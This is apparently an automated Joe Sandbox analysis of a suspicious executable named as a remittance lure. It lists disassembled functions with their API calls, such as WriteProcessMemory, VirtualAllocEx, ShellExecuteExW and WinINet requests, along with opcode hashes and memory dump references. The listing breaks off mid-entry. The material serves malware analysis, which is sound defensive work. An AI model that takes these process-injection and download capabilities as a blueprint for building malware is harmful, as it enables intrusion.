                                                                      • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                      • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                      • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                      • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                      • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 0041780F
                                                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                      • __getptd.LIBCMT ref: 00417826
                                                                      • __amsg_exit.LIBCMT ref: 00417834
                                                                      • __lock.LIBCMT ref: 00417844
                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                      • String ID:
                                                                      • API String ID: 938513278-0
                                                                      • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                      • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                      • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                      • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                      APIs
                                                                        • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                      • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                      • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                      • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                      • ExitThread.KERNEL32 ref: 00413D4E
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                      • __freefls@4.LIBCMT ref: 00413D74
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                      • String ID:
                                                                      • API String ID: 2403457894-0
                                                                      • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                      • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                      • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                      • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                      APIs
                                                                        • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                      • ExitThread.KERNEL32 ref: 004151ED
                                                                      • __freefls@4.LIBCMT ref: 00415209
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                      • String ID:
                                                                      • API String ID: 4247068974-0
                                                                      • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                      • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                      • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                      • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )$U$\
                                                                      • API String ID: 0-3705770531
                                                                      • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                      • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                      • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                      • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                      APIs
                                                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                      • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                      • CoUninitialize.OLE32 ref: 0046E53D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 886957087-24824748
                                                                      • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                      • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                      • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                      • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: \
                                                                      • API String ID: 4104443479-2967466578
                                                                      • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                      • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                      • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                      • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: \
                                                                      • API String ID: 4104443479-2967466578
                                                                      • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                      • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                      • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                      • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: \
                                                                      • API String ID: 4104443479-2967466578
                                                                      • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                      • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                      • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                      • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                      Strings
                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                      • API String ID: 708495834-557222456
                                                                      • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                      • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                      • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                      • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                      APIs
                                                                        • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                        • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                        • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                        • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                        • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                      • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                      • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                      • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                      • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: \$]$h
                                                                      • API String ID: 4104443479-3262404753
                                                                      • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                      • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                      • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                      • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                      APIs
                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                      • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                      • String ID: <$@
                                                                      • API String ID: 2417854910-1426351568
                                                                      • Opcode ID: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                      • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                      • Opcode Fuzzy Hash: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                      • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                      APIs
                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3705125965-3916222277
                                                                      • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                      • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                      • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                      • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                      • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                      • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
